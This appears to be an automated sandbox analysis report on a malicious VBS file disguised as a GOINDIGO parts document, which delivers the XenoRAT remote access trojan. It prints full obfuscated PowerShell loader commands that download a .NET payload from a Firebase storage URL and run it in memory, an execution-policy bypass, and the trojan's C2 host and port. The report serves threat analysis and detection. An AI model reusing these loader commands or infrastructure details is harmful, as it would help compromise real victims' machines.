Analysis

  • max time kernel
    102s
  • max time network
    102s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    10-07-2024 15:12

General

  • Target

    GOINDIGO_PN#_Desc_&_Qty Details.vbs

  • Size

    6.6MB

  • MD5

    6776a1e5031d3e57bff6359bc884c1f3

  • SHA1

    bb9883c15f718846f1e23744f09044fc6185f25f

  • SHA256

    56c0fcdebcda39f9a98c7b4471aeee2e8e7389bf2e5874fa945fe3f61c4ac654

  • SHA512

    7b0c36ffa6ffdf300cfe50539f096cbc3a0181b8a1632012c88bea3270cf239757c45b4f26a3aaf723b9bce29fdb22194ddd6351b669d2257fe34523fe1c1f81

  • SSDEEP

    1536:7ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssV:SI

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe

Extracted

Family

xenorat

C2

krecgh.4cloud.click

Mutex

Xeno_rat_nd8912d

Attributes
  • delay

    5000

  • install_path

    nothingset

  • port

    3398

  • startup_name

    nothingset

Signatures

  • XenorRat

    XenorRat is a remote access trojan written in C#.

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\GOINDIGO_PN#_Desc_&_Qty Details.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1056
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Bw▒HM▒aQBj▒HQ▒I▒▒9▒C▒▒Jw▒w▒DE▒Jw▒7▒CQ▒ZgBp▒Ho▒YgBs▒C▒▒PQ▒g▒Cc▒JQBw▒Ho▒QQBj▒E8▒ZwBJ▒G4▒TQBy▒CU▒Jw▒7▒Fs▒QgB5▒HQ▒ZQBb▒F0▒XQ▒g▒CQ▒d▒Bi▒HQ▒ZgBi▒C▒▒PQ▒g▒Fs▒cwB5▒HM▒d▒Bl▒G0▒LgBD▒G8▒bgB2▒GU▒cgB0▒F0▒Og▒6▒EY▒cgBv▒G0▒QgBh▒HM▒ZQ▒2▒DQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒g▒Cg▒TgBl▒Hc▒LQBP▒GI▒agBl▒GM▒d▒▒g▒E4▒ZQB0▒C4▒VwBl▒GI▒QwBs▒Gk▒ZQBu▒HQ▒KQ▒u▒EQ▒bwB3▒G4▒b▒Bv▒GE▒Z▒BT▒HQ▒cgBp▒G4▒Zw▒o▒Cc▒a▒B0▒HQ▒c▒Bz▒Do▒Lw▒v▒GY▒aQBy▒GU▒YgBh▒HM▒ZQBz▒HQ▒bwBy▒GE▒ZwBl▒C4▒ZwBv▒G8▒ZwBs▒GU▒YQBw▒Gk▒cw▒u▒GM▒bwBt▒C8▒dg▒w▒C8▒Yg▒v▒HI▒bwBk▒HI▒aQBh▒Gs▒Z▒▒t▒Dg▒N▒▒x▒DM▒Z▒▒u▒GE▒c▒Bw▒HM▒c▒Bv▒HQ▒LgBj▒G8▒bQ▒v▒G8▒LwBk▒Gw▒b▒▒l▒DI▒RgBk▒Gw▒b▒▒l▒DI▒M▒BI▒G8▒c▒Bl▒C4▒d▒B4▒HQ▒PwBh▒Gw▒d▒▒9▒G0▒ZQBk▒Gk▒YQ▒m▒HQ▒bwBr▒GU▒bg▒9▒DY▒MQBj▒Dg▒Mg▒5▒GY▒Ng▒t▒GU▒MQ▒5▒DY▒LQ▒0▒Dk▒ZQ▒4▒C0▒Yg▒0▒GY▒Zg▒t▒D▒▒N▒▒x▒DE▒Mw▒0▒DU▒Nw▒3▒GY▒ZgBl▒Cc▒KQ▒p▒Ds▒WwBz▒Hk▒cwB0▒GU▒bQ▒u▒EE▒c▒Bw▒EQ▒bwBt▒GE▒aQBu▒F0▒Og▒6▒EM▒dQBy▒HI▒ZQBu▒HQ▒R▒Bv▒G0▒YQBp▒G4▒LgBM▒G8▒YQBk▒Cg▒J▒B0▒GI▒d▒Bm▒GI▒KQ▒u▒Ec▒ZQB0▒FQ▒eQBw▒GU▒K▒▒n▒EM▒b▒Bh▒HM▒cwBM▒Gk▒YgBy▒GE▒cgB5▒DM▒LgBD▒Gw▒YQBz▒HM▒MQ▒n▒Ck▒LgBH▒GU▒d▒BN▒GU▒d▒Bo▒G8▒Z▒▒o▒Cc▒WgB4▒Es▒S▒BH▒Cc▒KQ▒u▒Ek▒bgB2▒G8▒awBl▒Cg▒J▒Bu▒HU▒b▒Bs▒Cw▒I▒Bb▒G8▒YgBq▒GU▒YwB0▒Fs▒XQBd▒C▒▒K▒▒n▒DI▒Nw▒0▒DQ▒MQBl▒DQ▒ZQ▒y▒GI▒ZQ▒w▒C0▒M▒▒w▒GM▒YQ▒t▒GU▒MQ▒2▒DQ▒LQ▒4▒GQ▒N▒Bi▒C0▒MwBi▒Dg▒YwBl▒DM▒NwBl▒D0▒bgBl▒Gs▒bwB0▒CY▒YQBp▒GQ▒ZQBt▒D0▒d▒Bs▒GE▒PwB0▒Hg▒d▒▒u▒HI▒YQB0▒FM▒Z▒Bl▒FI▒LwBv▒C8▒bQBv▒GM▒LgB0▒G8▒c▒Bz▒H▒▒c▒Bh▒C4▒M▒▒4▒Dk▒Ng▒1▒C0▒ZQBw▒G8▒a▒▒v▒GI▒Lw▒w▒HY▒LwBt▒G8▒Yw▒u▒HM▒aQBw▒GE▒ZQBs▒Gc▒bwBv▒Gc▒LgBl▒Gc▒YQBy▒G8▒d▒Bz▒GU▒cwBh▒GI▒ZQBy▒Gk▒Zg▒v▒C8▒OgBz▒H▒▒d▒B0▒Gg▒Jw▒g▒Cw▒I▒▒k▒GY▒aQB6▒GI▒b▒▒g▒Cw▒I▒▒n▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒Xw▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒Cc▒L▒▒g▒CQ▒c▒Bz▒Gk▒YwB0▒Cw▒I▒▒n▒DE▒Jw▒s▒C▒▒JwBS▒G8▒Z▒Bh▒Cc▒I▒▒p▒Ck▒Ow▒=';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\GOINDIGO_PN#_Desc_&_Qty Details.vbs');powershell -command $KByHL;
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4484
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$psict = '01';$fizbl = 'C:\Users\Admin\AppData\Local\Temp\GOINDIGO_PN#_Desc_&_Qty Details.vbs';[Byte[]] $tbtfb = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe'));[system.AppDomain]::CurrentDomain.Load($tbtfb).GetType('ClassLibrary3.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('27441e4e2be0-00ca-e164-8d4b-3b8ce37e=nekot&aidem=tla?txt.ratSdeR/o/moc.topsppa.08965-epoh/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $fizbl , '_______________________-------------', $psict, '1', 'Roda' ));"
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of SetThreadContext
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3876
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1996
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
            5⤵
            • Adds Run key to start application
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:5116
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\GOINDIGO_PN#_Desc_&_Qty Details.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3624
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2220
          • C:\Windows\SysWOW64\schtasks.exe
            "schtasks.exe" /query /v /fo csv
            5⤵
              PID:1328
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:4868
              • C:\Windows\SysWOW64\choice.exe
                choice /C Y /N /D Y /T 3
                6⤵
                  PID:1988

      Network

      MITRE ATT&CK Enterprise v15

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        6cf293cb4d80be23433eecf74ddb5503

        SHA1

        24fe4752df102c2ef492954d6b046cb5512ad408

        SHA256

        b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

        SHA512

        0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        64B

        MD5

        d8b9a260789a22d72263ef3bb119108c

        SHA1

        376a9bd48726f422679f2cd65003442c0b6f6dd5

        SHA256

        d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

        SHA512

        550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        976B

        MD5

        7b07823effb30f11f2e228005f5e151f

        SHA1

        8962692fbac2ac00d347933f2e968113f154a3f0

        SHA256

        f79e67e83189d99614ba89d21670473953f9122eaf85db854b836353c93b7ec9

        SHA512

        561ef1d85d61a5ea5f6d434ed77ec3c8ce36deff035e800f73f22010c4ad6747d26fa03dd1166a6be439828155ee5eed84ec610347c83cd362f3c80c6294a9f0

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        64B

        MD5

        5caad758326454b5788ec35315c4c304

        SHA1

        3aef8dba8042662a7fcf97e51047dc636b4d4724

        SHA256

        83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

        SHA512

        4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mt2frmso.wq4.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\xx1.ps1

        Filesize

        265B

        MD5

        3613b0cfa9cd66b5bc0bc4aabe147838

        SHA1

        94bb2a7ae944b9906f95ac19bd3fd199a4396a6b

        SHA256

        6bc7c43d63f298a0078345bac278b90076521d73259fc34f046df021d738f653

        SHA512

        282e0d1543850ea5affae87b3e66d1ffbf837c1f2c976843874dc6f0746bb989b18b9ff0be74726165cd8dbdb64068d21f9bd44f04eef5764e1f14fccd31698b

      • memory/2220-67-0x0000000005F20000-0x0000000005F86000-memory.dmp

        Filesize

        408KB

      • memory/2220-61-0x0000000000400000-0x0000000000412000-memory.dmp

        Filesize

        72KB

      • memory/3876-60-0x00000212D2180000-0x00000212D218A000-memory.dmp

        Filesize

        40KB

      • memory/3876-22-0x00000212D2170000-0x00000212D2178000-memory.dmp

        Filesize

        32KB

      • memory/4484-0-0x00007FFB5A243000-0x00007FFB5A245000-memory.dmp

        Filesize

        8KB

      • memory/4484-12-0x00007FFB5A240000-0x00007FFB5AD01000-memory.dmp

        Filesize

        10.8MB

      • memory/4484-11-0x00007FFB5A240000-0x00007FFB5AD01000-memory.dmp

        Filesize

        10.8MB

      • memory/4484-66-0x00007FFB5A240000-0x00007FFB5AD01000-memory.dmp

        Filesize

        10.8MB

      • memory/4484-1-0x0000015CFB0F0000-0x0000015CFB112000-memory.dmp

        Filesize

        136KB